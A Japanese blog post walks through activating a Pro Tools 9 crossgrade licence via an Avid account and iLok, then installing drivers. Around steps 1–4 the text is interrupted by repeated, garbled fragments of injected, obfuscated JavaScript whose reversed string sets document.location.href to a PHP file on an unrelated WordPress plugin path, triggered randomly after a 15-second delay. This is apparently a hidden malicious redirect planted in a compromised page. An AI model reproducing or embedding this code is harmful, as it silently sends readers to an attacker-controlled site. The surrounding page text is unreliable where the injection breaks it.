Pro Tools 9 クロスアップデートしました

前の投稿でWindows7にProTools8をインストールした記事を書きましたが
PろTools9が出ていることをしって、このたび購入してしましました。

そんなわけで、さっそくインストールしようとしましたが、iLokにランセンスがでない・・・
と困って調べることになったので、簡単に手順を書くことにします。

最初に手順を読んでいれば悩むこともないんでしょうが、わからなかったらしらべるという性格なのです。

1.ProTools9のアクティベーションをWebサイトで行う
 iLokの前に以下のサイトでアクティベーションを行います。
  dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}https://account.avid.com
 ProTools9.0LE クロスグレード・アクティベーション・カードには、この手順が書かれていないというオチ。

 Avidアカウントでログイン
 (クロスグレードの場合、前にアクティベートしているはずなので作成済みかと思います)

2.アクティベーション・コードを入力
 以下のような画面が表示されるのでProTools9.0LE クロスグレード・アクティベーション・カードに
 記載されているコードを入力して、今すぐダウンロードボタンをクリック。
 
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html/20110504_000″ rel=”attachment wp-att-794″>dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

3.iLok情報とハードウェア・シリアル番号を入力
 iLok情報には、iLok情報のアカウント(ユーザID)を入力。
 ハードウェアのシリアル番号は、H/Wの背面に貼ってあるシールに書いてあるシリアル番号を入力して続行。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html/20110504_001″ rel=”attachment wp-att-795″>dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

4.iLokにライセンス情報をダウンロード
 今度は、iLokのサイトに接続してログイン。
 dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://www.ilok.com/

 そうすると、以下のように新しいライセンスが表示されていると思います。
 (DELETEボタンは絶対押したらだめです。ライセンスがきえてしまいます)

 Download To iLokボタンをクリックするとライセンス情報がiLokにコピーされます。
 これによりProToolsを起動したときに正常に認証できるようになります。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html/20110504_002″ rel=”attachment wp-att-796″>dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} 

5.ProToolsのインストール
 ProTools9をインストール。

6.ProToolsのデバイスインストール
 ProTools9以前のドライバだとだめなので
 CDに入っているドライバ、または、サイトからダウンロードしてドライバをインストール。

 Pro Tools 9用ドライバーのダウンロードとアップデート
 http://avid.custkb.com/avid/app/selfservice/search.jsp?DocId=379411
 
以上で、起動できるかと思います。

あとは、設定の見直しをしてみるといいかと思います。

コンピューター最適化ガイド ? Mac及びWindows [367983]
http://avid.custkb.com/avid/app/selfservice/search.jsp?DocId=367983


Windows ガイド – Windows 7 最適化とトラブルシュート [349411]
http://avid.custkb.com/avid/app/selfservice/search.jsp?DocId=349411

使ってみた感想は、特にProTools8からあまり変わり映えしないというか
見た目も一緒だし、違和感なく使えました。
むしろ、どこが変わったか調べないとわからないレベルですね。

1つのコメントがあります : Pro Tools 9 クロスアップデートしました

コメントを残す